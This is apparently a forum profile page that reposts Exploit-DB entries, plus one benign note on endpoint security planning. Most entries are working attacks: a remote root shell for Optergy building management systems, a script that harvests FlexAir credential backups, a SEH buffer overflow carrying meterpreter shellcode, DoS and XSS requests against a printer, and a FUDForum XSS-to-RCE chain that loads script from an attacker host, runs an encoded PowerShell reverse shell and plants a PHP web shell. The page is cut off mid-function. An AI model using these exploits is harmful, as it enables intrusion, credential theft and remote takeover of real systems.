HireHackking

Everything posted by HireHackking

  1. # Exploit Title: RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path
     # Google Dork: N/A
     # Date: 2019-11-11
     # Exploit Author: chuyreds
     # Vendor Homepage: https://www.realtek.com/en/
     # Software Link: https://support.hp.com/mx-es/drivers/selfservice/hp-spectre-13-4000-x360-convertible-pc/7527520/model/7835502?sku=K8N38LA
     # Version: 6.4.10041.133
     # Tested on: Windows 10 Home Single Language
     # CVE : N/A
     # Explot-Realtek.txt

     #Service Info:

     C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
     RTK IIS Codec Service    RtkI2SCodec    C:\Program Files\Realtek\Audio\IIS\RtkI2SAudioService64.exe    Auto

     C:\Users\user>sc query RtkI2SCodec
     NOMBRE_SERVICIO: RtkI2SCodec
             TIPO               : 10  WIN32_OWN_PROCESS
             ESTADO             : 4  RUNNING
                                     (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
             CÓD_SALIDA_WIN32   : 0  (0x0)
             CÓD_SALIDA_SERVICIO: 0  (0x0)
             PUNTO_COMPROB.     : 0x0
             INDICACIÓN_INICIO  : 0x0
  2. # Title: Optergy 2.3.0a - Remote Code Execution
     # Author: LiquidWorm
     # Date: 2019-11-05
     # Vendor: https://optergy.com/
     # Product web page: https://optergy.com/products/
     # Affected version: <=2.3.0a
     # Advisory: https://applied-risk.com/resources/ar-2019-008
     # Paper: https://applied-risk.com/resources/i-own-your-building-management-system
     # CVE: CVE-2019-7276
     # PoC:

     #!/usr/bin/env python
     #
     # Unauthenticated Remote Root Exploit in Optergy BMS (Console Backdoor)
     #
     # Affected version <=2.0.3a (Proton and Enterprise)
     #
     ##############################################################################
     #
     # lqwrm@metalgear:~/stuff/optergy$ python getroot.py 192.168.232.19
     # Challenge received: 1547540929287
     # SHA1: 56a6e5bf103591ed45faa2159cae234d04f06d93
     # MD5 from SHA1: 873efc9ca9171d575623a99aeda44e31
     # Answer: 56a6e5bf103591ed45faa2159cae234d04f06d93873efc9ca9171d575623a99aeda44e31
     # # id
     # uid=0(root) gid=0(root) groups=0(root)
     #
     ##############################################################################
     #
     #

     import os#######
     import sys######
     import json#####
     import hashlib##
     import requests#

     piton = os.path.basename(sys.argv[0])

     if len(sys.argv) < 2:
         print '\n\x20\x20[*] Usage: '+piton+' <ip:port>\n'
         sys.exit()

     while True:
         challenge_url = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html?get'
         try:
             req1 = requests.get(challenge_url)
             get_challenge = json.loads(req1.text)
             challenge = get_challenge['response']['message']
             print 'Challenge received: ' + challenge
             hash_object = hashlib.sha1(challenge.encode())
             print 'SHA1: '+(hash_object.hexdigest())
             h1 = (hash_object.hexdigest())
             hash_object = hashlib.md5(h1.encode())
             print 'MD5 from SHA1: '+(hash_object.hexdigest())
             h2 = (hash_object.hexdigest())
             print 'Answer: '+h1+h2
             zeTargets = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html'
             zeCommand = raw_input('# ')
             if zeCommand.strip() == 'exit':
                 sys.exit()
             zeHeaders = {'User-Agent' : 'BB/BMS-251.4ev4h',
                          'Accept' : '*/*',
                          'Accept-Encoding' : 'gzip, deflate',
                          'Accept-Language' : 'mk-MK,mk;q=1.7',
                          'Connection' : 'keep-alive',
                          'Connection-Type' : 'application/x-www-form-urlencoded'}
             zePardata = {'command' : 'sudo '+zeCommand,
                          'challenge' : challenge,
                          'answer' : h1+h2}
             zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)
             get_resp = json.loads(zeRequest.text)
             get_answ = get_resp['response']['message']
             print get_answ
         except Exception:
             print '[*] Error!'
             break
  3. # Exploit Title: FlexAir Access Control 2.3.35 - Authentication Bypass
     # Google Dork: NA
     # Date: 2019-11-11
     # Exploit Author: LiquidWorm
     # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
     # Software Link: https://www.computrols.com/building-automation-software/
     # Version: 2.3.35
     # Tested on: NA
     # CVE : CVE-2019-7666, CVE-2019-7667
     # Advisory: https://applied-risk.com/resources/ar-2019-007
     # Paper: https://applied-risk.com/resources/i-own-your-building-management-system

     #!/usr/bin/env python
     # -*- coding: utf8 -*-
     #
     # Prima FlexAir Access Control 2.3.35 Database Backup Predictable Name Exploit
     # Authentication Bypass (Login with MD5 hash)
     #
     # Older versions: /links/Nova_Config_2019-01-03.bck
     # Older versions: /Nova/assets/Nova_Config_2019-01-03.bck
     # Newer versions: /links/Nova_Config_2019-01-03_13-53.pdb3
     # Fixed versions: 2.4
     #
     ###################################################################################
     #
     # lqwrm@metalgear:~/stuff/prima$ python exploitDB.py http://192.168.230.17:8080
     # [+] Please wait while fetchin the backup config file...
     # [+] Found some juice!
     # [+] Downloading: http://192.168.230.17:8080/links/Nova_Config_2019-01-07.bck
     # [+] Saved as: Nova_Config_2019-01-07.bck-105625.db
     # lqwrm@metalgear:~/stuff/prima$ sqlite3 Nova_Config_2019-01-07.bck-105625.db
     # SQLite version 3.22.0 2018-01-22 18:45:57
     # Enter ".help" for usage hints.
     # sqlite> select usrloginname,usrloginpassword from users where usrid in (1,2);
     # superadmin|0dfcfa8cc7fd39d96ffe22dd406b5065
     # sysadmin|1af01c4a5a4ec37f451a9feb20a0bbbe
     # sqlite> .q
     # lqwrm@metalgear:~/stuff/prima$
     #
     ###################################################################################
     #
     # 11.01.2019
     #

     import os#######
     import sys######
     import time#####
     import requests#
     from datetime import timedelta, date
     from requests.packages.urllib3.exceptions import InsecureRequestWarning
     requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

     piton = os.path.basename(sys.argv[0])

     if len(sys.argv) < 2:
         print '[+] Usage: '+piton+' [target]'
         print '[+] Target example 1: http://10.0.0.17:8080'
         print '[+] Target example 2: https://primanova.tld\n'
         sys.exit()

     host = sys.argv[1]

     def datum(start_date, end_date):
         for n in range(int ((end_date - start_date).days)):
             yield start_date + timedelta(n)

     start_date = date(2017, 1, 1)
     end_date = date(2019, 12, 30)

     print '[+] Please wait while fetchin the backup config file...'

     def spinning_cursor():
         while True:
             for cursor in '|/-\\':
                 yield cursor

     spinner = spinning_cursor()

     for mooshoo in datum(start_date, end_date):
         sys.stdout.write(next(spinner))
         sys.stdout.flush()
         time.sleep(0.1)
         sys.stdout.write('\b')
         h = requests.get(host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck', verify=False)
         if (h.status_code) == 200:
             print '[+] Found some juice!'
             print '[+] Downloading: '+host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck'
             timestr = time.strftime('%H%M%S')
             time.sleep(1)
             open('Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db', 'wb').write(h.content)
             print '[+] Saved as: Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db'
             sys.exit()

     print '[-] No backup for you today. :('
  4. # Exploit Title: Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting
     # Google Dork: NA
     # Date: 2018-09-06
     # Exploit Author: Rishu Ranjan
     # Vendor Homepage: https://www.myadrenalin.com/
     # Software Link: https://www.myadrenalin.com/core-hcm/
     # Version: 5.4.0 (REQUIRED)
     # Tested on: NA
     # CVE : CVE-2018-12653
     # Type: webapps
     # Platform: Multiple

     # Description
     # ====================
     # A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in
     # Adrenalin Core HCM v5.4.0 HRMS Software. The user supplied input containing
     # malicious JavaScript is echoed back as it is in JavaScript code in an HTML
     # response.

     URL
     ====================
     https://<HOST:PORT>/myadrenalin/RPT/SSRSDynamicEditReports.aspx?ReportId=109LWFREPORT.RDL15822%27%3balert(%22Reflected%20XSS%22)%2f%2f773&Export=0

     Parameter
     ====================
     ReportId

     Attack Type
     ====================
     Remote

     CVE Impact Other
     ====================
     Allows an attacker to inject malicious JavaScript which can steal cookies, redirect users to other malicious websites, etc.

     Reference
     ====================
     https://nvd.nist.gov/vuln/detail/CVE-2018-12653
     https://www.knowcybersec.com/2019/02/CVE-2018-12653-reflected-XSS.html

     Discoverer
     ====================
     Rishu Ranjan
  5. # Exploit Title: Wondershare Application Framework Service - "WsAppService" Unquote Service Path
     # Google Dork: N/A
     # Date: 2019-11-11
     # Exploit Author: chuyreds
     # Vendor Homepage: https://www.wondershare.com/
     # Software Link: https://www.wondershare.com/drfone/
     # Version: 2.4.3.231
     # Tested on: Windows 10 Home Single Language
     # CVE : N/A

     #Service Info:

     C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
     Wondershare Application Framework Service    WsAppService    C:\Program Files (x86)\Wondershare\WAF\2.4.3.231\WsAppService.exe    Auto

     C:\Users\user>sc query WsAppService
     NOMBRE_SERVICIO: WsAppService
             TIPO               : 10  WIN32_OWN_PROCESS
             ESTADO             : 4  RUNNING
                                     (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
             CÓD_SALIDA_WIN32   : 0  (0x0)
             CÓD_SALIDA_SERVICIO: 0  (0x0)
             PUNTO_COMPROB.     : 0x0
             INDICACIÓN_INICIO  : 0x0
  6. # Exploit Title: Control Center PRO 6.2.9 - Local Stack Based BufferOverflow (SEH)
     # Date: 2019-11-09
     # Exploit Author: Samir sanchez garnica @sasaga92
     # Vendor Homepage: http://www.webgateinc.com/wgi/eng/products/list.php?ec_idx1=P610
     # Software Link: http://www.webgateinc.com/wgi/eng/products/list.php?ec_idx1=P610&ptype=view&page=&p_idx=90&tab=download&#tabdown
     # Version: 6.2.9
     # Tested: Windows 10 pro N and Windows XP SP3
     # CVE : N/A

     #!/usr/bin/python
     '''
     A stack-based buffer overflow exists in the "create user" module: copying a
     sufficiently long string into the username/name field, which the software does
     not bounds-check, overwrites the SEH handler.
     '''
     import sys
     import random
     import string
     import struct
     import argparse

     def pattern_create(_type,_length):
         _type = _type.split(" ")
         if _type[0] == "trash":
             return _type[1] * _length
         elif _type[0] == "random":
             return ''.join(random.choice(string.lowercase) for i in range(_length))
         elif _type[0] == "pattern":
             _pattern = ''
             _parts = ['A', 'a', '0']
             while len(_pattern) != _length:
                 _pattern += _parts[len(_pattern) % 3]
                 if len(_pattern) % 3 == 0:
                     _parts[2] = chr(ord(_parts[2]) + 1)
                     if _parts[2] > '9':
                         _parts[2] = '0'
                         _parts[1] = chr(ord(_parts[1]) + 1)
                         if _parts[1] > 'z':
                             _parts[1] = 'a'
                             _parts[0] = chr(ord(_parts[0]) + 1)
                             if _parts[0] > 'Z':
                                 _parts[0] = 'A'
             return _pattern
         else:
             return "Not Found"

     def generate_file(_name_file, _payload):
         print _payload
         print "[+] Creando Archivo malicioso"
         _name_file = open(_name_file,"w+")
         _name_file.write(_payload)
         _name_file.close()
         print "[+] Payload de {0} bytes generado, exitosamente.".format(len(_payload))

     def main():
         _parser = argparse.ArgumentParser()
         _parser.add_argument("--os", dest="os", help="introduce el os, win10, winxp", required=True)
         _args = _parser.parse_args()

         #badchars 0x0a, 0x0d, >= 0x80
         _name_exploit = "ControlCenterPRO_v6_2_9.txt"

         #sudo ./msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -e x86/alpha_mixed EXITFUNC=seh -f c -b '\x00\x0a\x0d' BufferRegister=ESP
         _shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
                       "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
                       "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
                       "\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x69\x78\x4e\x62\x37\x70"
                       "\x43\x30\x45\x50\x31\x70\x6f\x79\x4d\x35\x46\x51\x6f\x30\x50"
                       "\x64\x4e\x6b\x72\x70\x50\x30\x4e\x6b\x46\x32\x64\x4c\x6e\x6b"
                       "\x71\x42\x32\x34\x6c\x4b\x61\x62\x34\x68\x66\x6f\x6e\x57\x30"
                       "\x4a\x76\x46\x76\x51\x49\x6f\x4e\x4c\x47\x4c\x63\x51\x63\x4c"
                       "\x75\x52\x76\x4c\x35\x70\x49\x51\x58\x4f\x54\x4d\x75\x51\x4b"
                       "\x77\x6b\x52\x39\x62\x46\x32\x53\x67\x4c\x4b\x50\x52\x76\x70"
                       "\x4c\x4b\x71\x5a\x77\x4c\x6e\x6b\x42\x6c\x46\x71\x32\x58\x6a"
                       "\x43\x61\x58\x56\x61\x68\x51\x76\x31\x4c\x4b\x73\x69\x55\x70"
                       "\x57\x71\x4b\x63\x4e\x6b\x67\x39\x66\x78\x6d\x33\x56\x5a\x32"
                       "\x69\x6c\x4b\x35\x64\x4c\x4b\x55\x51\x6a\x76\x50\x31\x59\x6f"
                       "\x4c\x6c\x39\x51\x58\x4f\x64\x4d\x35\x51\x5a\x67\x54\x78\x79"
                       "\x70\x53\x45\x5a\x56\x67\x73\x71\x6d\x49\x68\x45\x6b\x73\x4d"
                       "\x31\x34\x63\x45\x68\x64\x51\x48\x4c\x4b\x70\x58\x44\x64\x37"
                       "\x71\x49\x43\x72\x46\x4c\x4b\x36\x6c\x52\x6b\x4e\x6b\x30\x58"
                       "\x77\x6c\x36\x61\x4a\x73\x4e\x6b\x77\x74\x4c\x4b\x56\x61\x7a"
                       "\x70\x6e\x69\x42\x64\x45\x74\x71\x34\x63\x6b\x61\x4b\x51\x71"
                       "\x52\x79\x52\x7a\x72\x71\x39\x6f\x39\x70\x73\x6f\x51\x4f\x73"
                       "\x6a\x4e\x6b\x64\x52\x58\x6b\x6c\x4d\x73\x6d\x61\x78\x55\x63"
                       "\x77\x42\x55\x50\x67\x70\x42\x48\x73\x47\x54\x33\x36\x52\x63"
                       "\x6f\x46\x34\x73\x58\x52\x6c\x63\x47\x44\x66\x56\x67\x69\x6f"
                       "\x48\x55\x6d\x68\x5a\x30\x45\x51\x77\x70\x37\x70\x75\x79\x58"
                       "\x44\x70\x54\x42\x70\x53\x58\x44\x69\x4f\x70\x30\x6b\x57\x70"
                       "\x39\x6f\x5a\x75\x42\x4a\x34\x4b\x42\x79\x52\x70\x4d\x32\x39"
                       "\x6d\x62\x4a\x46\x61\x32\x4a\x37\x72\x32\x48\x69\x7a\x66\x6f"
                       "\x69\x4f\x39\x70\x4b\x4f\x4b\x65\x4e\x77\x30\x68\x47\x72\x63"
                       "\x30\x52\x31\x33\x6c\x4e\x69\x7a\x46\x61\x7a\x56\x70\x61\x46"
                       "\x30\x57\x75\x38\x6b\x72\x69\x4b\x44\x77\x73\x57\x79\x6f\x69"
                       "\x45\x4d\x55\x6b\x70\x63\x45\x46\x38\x52\x77\x50\x68\x38\x37"
                       "\x48\x69\x45\x68\x4b\x4f\x69\x6f\x59\x45\x46\x37\x52\x48\x71"
                       "\x64\x68\x6c\x67\x4b\x39\x71\x59\x6f\x6a\x75\x52\x77\x6e\x77"
                       "\x45\x38\x63\x45\x32\x4e\x42\x6d\x30\x61\x59\x6f\x4e\x35\x31"
                       "\x7a\x35\x50\x30\x6a\x46\x64\x50\x56\x52\x77\x61\x78\x47\x72"
                       "\x58\x59\x59\x58\x53\x6f\x39\x6f\x49\x45\x6b\x33\x48\x78\x63"
                       "\x30\x73\x4e\x64\x6d\x4c\x4b\x56\x56\x53\x5a\x53\x70\x75\x38"
                       "\x77\x70\x52\x30\x63\x30\x45\x50\x33\x66\x50\x6a\x53\x30\x51"
                       "\x78\x70\x58\x79\x34\x31\x43\x4a\x45\x79\x6f\x4e\x35\x4e\x73"
                       "\x56\x33\x51\x7a\x67\x70\x43\x66\x61\x43\x56\x37\x75\x38\x35"
                       "\x52\x79\x49\x48\x48\x71\x4f\x4b\x4f\x7a\x75\x6e\x63\x6b\x48"
                       "\x77\x70\x51\x6e\x76\x67\x36\x61\x39\x53\x74\x69\x6b\x76\x44"
                       "\x35\x78\x69\x7a\x63\x6f\x4b\x59\x6e\x76\x6e\x30\x32\x6b\x5a"
                       "\x61\x7a\x33\x30\x56\x33\x39\x6f\x78\x55\x63\x5a\x65\x50\x79"
                       "\x53\x41\x41")

         _offset = 664
         _padding = 40000
         _nseh = "\x42\x42\x77\x08"
         _seh = struct.pack("<L", 0x637c1571) #0x0258107E pop edi # pop esi # retn lib_VoiceEngine_dll32.dll 3 8 one-reg, stack edi, esi nonull, ascii

         if _args.os.lower() == "win10":
             _esp_prepend = "\x54\x58\x66\x05\x34\x18\x50\x5C"
             _inject = pattern_create("trash A",_offset)
             _inject += _nseh
             _inject += _seh
             _inject += "A" * 4
             _inject += _esp_prepend
             _inject += _shellcode
             _inject += pattern_create("trash D",_padding-len(_inject))
         elif _args.os.lower() == "winxp":
             _esp_prepend = "\x54\x58\x66\x05\x7C\x0C\x50\x5C"
             _inject = pattern_create("trash A",_offset)
             _inject += _nseh
             _inject += _seh
             _inject += "A" * 4
             _inject += _esp_prepend
             _inject += "A" * 16
             _inject += _shellcode
             _inject += pattern_create("trash D",_padding-len(_inject))
         else:
             print("[-] os select is not support, select win10 or winxp")
             # no payload was built for an unknown target, so stop instead of failing on an undefined _inject
             sys.exit(1)

         generate_file(_name_exploit, _inject)

     if __name__ == "__main__":
         main()
  7. Thoughts on intranet endpoint security work

     Intranet office hosts

     Security requirements for office hosts
     The general requirements for office hosts are:
     - Intrusion detection and prevention (put bluntly, a HIPS or HIDS product, usually integrated into domestic antivirus software);
     - Vulnerability protection (patching, usually integrated into domestic antivirus software);
     - Software control (a software-center function, usually provided by the platform);
     - Logging;
     - Control scenarios (for example SSID restrictions and DLP data leak prevention).

     The logging requirement deserves explanation. Logging normally serves two purposes when responding to an attack, and it lets you trace the cause of an active attack. Logs can record e-mail, processes, services, commands and so on.

     Plan to improve office-host installation and online rate
     - Inspection of all staff
     - Intranet access
     - Forced background installation via virtual desktop
     Three-part work:
     - Push all employees to install
     - Re-check all employees
     - Push vulnerability patches, install them automatically and collect real-time logs

     Key control targets
     - Human resources department
     - Legal and finance departments
     - Senior executive group
     - Secretary and assistant groups
     - Investment and financing department
     - Other key personnel

     Expected key results
     - Improved autonomous defence capability
     - Automated vulnerability patching
     - Secure storage of sensitive data
     - Predictable virus outbreak scenarios
     - Simplified discovery of attack losses

     Internal and external servers

     Server security requirements
     The general requirements for servers are:
     Windows Server
     - Patch installation, plus monitoring and upgrading of vulnerable components (automatic upgrades or patching are not recommended, because servers have to reboot and the patching state becomes uncontrollable)
     - Autonomous defence (HIPS or HIDS functions; NIP can also be used at the network layer)
     - Trusted software center (software control)
     - Log monitoring
     Unix-like server
     - Vulnerability monitoring and remediation (manual upgrades under supervision; a missing-patch scanning engine combined with PoCs is recommended)
     - Autonomous defence module (HIPS or HIDS functions; NIP can also be used at the network layer)
     - Trusted software monitoring (use the official app store or official sources)
     - Log monitoring

     Solutions
     - Develop a good installation template (fully patched, with the required software installed and logs configured for the collection platform)
     - Requirements for going online must be based on the installation template
     - Establish an effective missing-patch scanning mechanism so that Unix-like servers form a closed loop of vulnerability remediation; this is effective for Windows systems as well. Installing or developing an in-house server guard program with unified control-platform management (unified vulnerability remediation) is also recommended.
     - Configure all logs into unified log management with automatic alert analysis.

     Key protection targets
     - Authentication servers such as domain controllers, RADIUS servers and SSO single sign-on servers.
     - Key network equipment such as routers, switches, firewalls, DHCP servers and DNS servers.
     - Key systems such as financial, HR, payroll, recruitment, legal, patent and document systems (contracts, agreements, bid documents).
     - Source code version control, key industrial control production equipment and other production assets.
  8. # Exploit Title: Bematech Printer MP-4200 - Denial of Service
     # Date: 2019-11-11
     # Exploit Author: Jonatas Fil
     # Vendor Homepage: https://www.bematech.com.br/
     # Software Link: https://www.bematech.com.br/produto/mp-4200-th/
     # Version: MP-4200 TH
     # Tested on: Windows and Linux
     # CVE : N/A

     DoS Poc:
     --------------------------------------------------------------------------------------------------------
     POST /en/conf_admin.html HTTP/1.1
     Host: TARGET
     User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
     Accept-Encoding: gzip, deflate
     Accept-Language: en-US,en;q=0.9,pt;q=0.8
     Cache-Control: max-age=0
     Referer: http://TARGET/en/conf_admin.html
     Content-Length: 40
     Content-Type: application/x-www-form-urlencoded

     admin=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&person=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&SUBMIT_ADMIN=Submit
     --------------------------------------------------------------------------------------------------------

     XSS Poc:
     --------------------------------------------------------------------------------------------------------
     POST /en/conf_admin.html HTTP/1.1
     Host: TARGET
     User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
     Accept-Encoding: gzip, deflate
     Accept-Language: en-US,en;q=0.9,pt;q=0.8
     Cache-Control: max-age=0
     Referer: http://printer.com/en/conf_admin.html
     Content-Length: 40
     Content-Type: application/x-www-form-urlencoded

     admin=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&person=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&SUBMIT_ADMIN=Submit
  9. # Exploit Title : FUDForum 3.0.9 - Remote Code Execution
     # Date: 2019-10-26
     # Exploit Author: liquidsky (JMcPeters)
     # Vulnerable Software: FUDForum 3.0.9
     # Vendor Homepage: https://sourceforge.net/projects/fudforum/
     # Version: 3.0.9
     # Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.0.9.zip/download
     # Tested On: Windows / mysql / apache
     # Author Site: https://github.com/fuzzlove/FUDforum-XSS-RCE
     # Demo: https://youtu.be/0gsJQ82TXw4 | https://youtu.be/fR8hVK1paks
     # CVE: CVE-2019-18873

     // Greetz : wetw0rk, Fr13ndz, offsec =)
     //
     // Description: Multiple Stored XSS vulnerabilities have been found in FUDforum 3.0.9 that may result in remote code execution.
     // The areas impacted are the admin panel and the forum.
     //
     // XSS via username in Forum:
     // 1. Register an account and log in to the forum.
     // 2. Go to the user control panel. -> Account Settings -> change login
     // 3. Insert javascript payload <script/src="http://attacker.machine/fud.js"></script>
     // 4. When the admin visits the user information the payload will fire, uploading a php shell on the remote system.
     //
     // XSS via user-agent in Admin Panel:
     // 1. Register an account and log in to the forum. If you have an IP already associated with a registered user this is not required. This step is so when you run the XSS payload from your attacker machine it gets logged under the user activity.
     // 2. Send the XSS payload below (from an IP associated with an account) / host the script:
     // 3. curl -A '<script src="http://attacker.machine/fud.js"></script>' http://target.machine/fudforum/index.php
     // 4. When the admin visits the user information from the admin controls / User Manager the payload will fire under "Recent sessions", uploading a php shell on the remote system.
     //

     function patience() {
         var u=setTimeout("grabShell()",5000);
     }

     // This function is to call the reverse shell php script (liquidsky.php).
     // currently using a powershell payload that will need to be modified.
     function grabShell() {
         var url ="/fudforum/liquidsky.php?cmd=%70%6f%77%65%72%73%68%65%6c%6c%20%2d%45%6e%63%6f%64%65%64%43%6f%6d%6d%61%6e%64%20%4a%41%42%6a%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%67%41%44%30%41%49%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%4d%41%62%77%42%6a%41%47%73%41%5a%51%42%30%41%48%4d%41%4c%67%42%55%41%45%4d%41%55%41%42%44%41%47%77%41%61%51%42%6c%41%47%34%41%64%41%41%6f%41%43%63%41%4d%51%41%35%41%44%49%41%4c%67%41%78%41%44%59%41%4f%41%41%75%41%44%49%41%4f%41%41%75%41%44%45%41%4e%51%41%79%41%43%63%41%4c%41%41%30%41%44%51%41%4d%77%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%67%41%44%30%41%49%41%41%6b%41%47%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%34%41%52%77%42%6c%41%48%51%41%55%77%42%30%41%48%49%41%5a%51%42%68%41%47%30%41%4b%41%41%70%41%44%73%41%57%77%42%69%41%48%6b%41%64%41%42%6c%41%46%73%41%58%51%42%64%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%41%41%50%51%41%67%41%44%41%41%4c%67%41%75%41%44%59%41%4e%51%41%31%41%44%4d%41%4e%51%42%38%41%43%55%41%65%77%41%77%41%48%30%41%4f%77%42%33%41%47%67%41%61%51%42%73%41%47%55%41%4b%41%41%6f%41%43%51%41%61%51%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%55%67%42%6c%41%47%45%41%5a%41%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%49%41%41%77%41%43%77%41%49%41%41%6b%41%47%49%41%65%51%42%30%41%47%55%41%63%77%41%75%41%45%77%41%5a%51%42%75%41%47%63%41%64%41%42%6f%41%43%6b%41%4b%51%41%67%41%43%30%41%62%67%42%6c%41%43%41%41%4d%41%41%70%41%48%73%41%4f%77%41%6b%41%47%51%41%59%51%42%30%41%47%45%41%49%41%41%39%41%43%41%41%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%4c%51%42%55%41%48%6b%41%63%41%42%6c%41%45%34%41%59%51%42%74%41%47%55%41%49%41%42%54%41%48%6b%41%63%77%42%30%41%47%55%41%62%51%41%75%41%46%51%41%5a%51%42%34%41%48%51%41%4c%67%42%42%41%46%4d%41%51%77%42%4a%41%45%6b%41%52%51%42%75%41%47%4d%41%62%77%42%6b%41%47%6b%41%62%67%42%6e%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%54%41%48%51%41%63%67%42%70%41%47%34%41%5a%77%41%6f%41%43%51%41%59%67%42%35%41%48%51%41%5a%51%42%7a%41%43%77%41%4d%41%41%73%41%43%41%41%4a%41%42%70%41%43%6b%41%4f%77%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%44%30%41%49%41%41%6f%41%47%6b%41%5a%51%42%34%41%43%41%41%4a%41%42%6b%41%47%45%41%64%41%42%68%41%43%41%41%4d%67%41%2b%41%43%59%41%4d%51%41%67%41%48%77%41%49%41%42%50%41%48%55%41%64%41%41%74%41%46%4d%41%64%41%42%79%41%47%6b%41%62%67%42%6e%41%43%41%41%4b%51%41%37%41%43%51%41%63%77%42%6c%41%47%34%41%5a%41%42%69%41%47%45%41%59%77%42%72%41%44%49%41%49%41%41%67%41%44%30%41%49%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%67%41%43%73%41%49%41%41%6e%41%46%41%41%55%77%41%67%41%43%63%41%49%41%41%72%41%43%41%41%4b%41%42%77%41%48%63%41%5a%41%41%70%41%43%34%41%55%41%42%68%41%48%51%41%61%41%41%67%41%43%73%41%49%41%41%6e%41%44%34%41%49%41%41%6e%41%44%73%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%49%41%41%39%41%43%41%41%4b%41%42%62%41%48%51%41%5a%51%42%34%41%48%51%41%4c%67%42%6c%41%47%34%41%59%77%42%76%41%47%51%41%61%51%42%75%41%47%63%41%58%51%41%36%41%44%6f%41%51%51%42%54%41%45%4d%41%53%51%42%4a%41%43%6b%41%4c%67%42%48%41%47%55%41%64%41%42%43%41%48%6b%41%64%41%42%6c%41%48%4d%41%4b%41%41%6b%41%48%4d%41%5a%51%42%75%41%47%51%41%59%67%42%68%41%47%4d%41%61%77%41%79%41%43%6b%41%4f%77%41%6b%41%48%4d%41%64%41%42%79%41%47%55%41%59%51%42%74%41%43%34%41%56%77%42%79%41%47%6b%41%64%41%42%6c%41%43%67%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%41%41%77%41%43%77%41%4a%41%42%7a%41%47%55%41%62%67%42%6b%41%47%49%41%65%51%42%30%41%47%55%41%4c%67%42%4d%41%47%55%41%62%67%42%6e%41%48%51%41%61%41%41%70%41%44%73%41%4a%41%42%7a%41%48%51%41%63%67%42%6c%41%47%45%41%62%51%41%75%41%45%59%41%62%41%42%31%41%48%4d%41%61%41%41%6f%41%43%6b%41%66%51%41%37%41%43%51%41%59%77%42%73%41%47%6b%41%5a%51%42%75%41%48%51%41%4c%67%42%44%41%47%77%41%62%77%42%7a%41%47%55%41%4b%41%41%70%41%41%6f%41";
         xhr = new XMLHttpRequest();
         xhr.open("GET", url, true);
         xhr.send(null);
     }

     function submitFormWithTokenJS(token) {
         var xhr = new XMLHttpRequest();
         xhr.open("POST", '/fudforum/adm/admbrowse.php', true);

         // Send the proper header information along with the request
         xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary=-----------------------------9703186584101745941654835853");

         var currentdir = "C:/xampp/htdocs/fudforum"; // webroot - forum directory
         var fileName = "liquidsky.php";
         var url = "/fudforum/adm/admbrowse.php";
         var ctype = "application/x-php";
         var fileData = "<?php if(isset($_REQUEST['cmd'])){ echo '<pre>'; $cmd = ($_REQUEST['cmd']); system($cmd); echo '</pre>'; die; }?>";
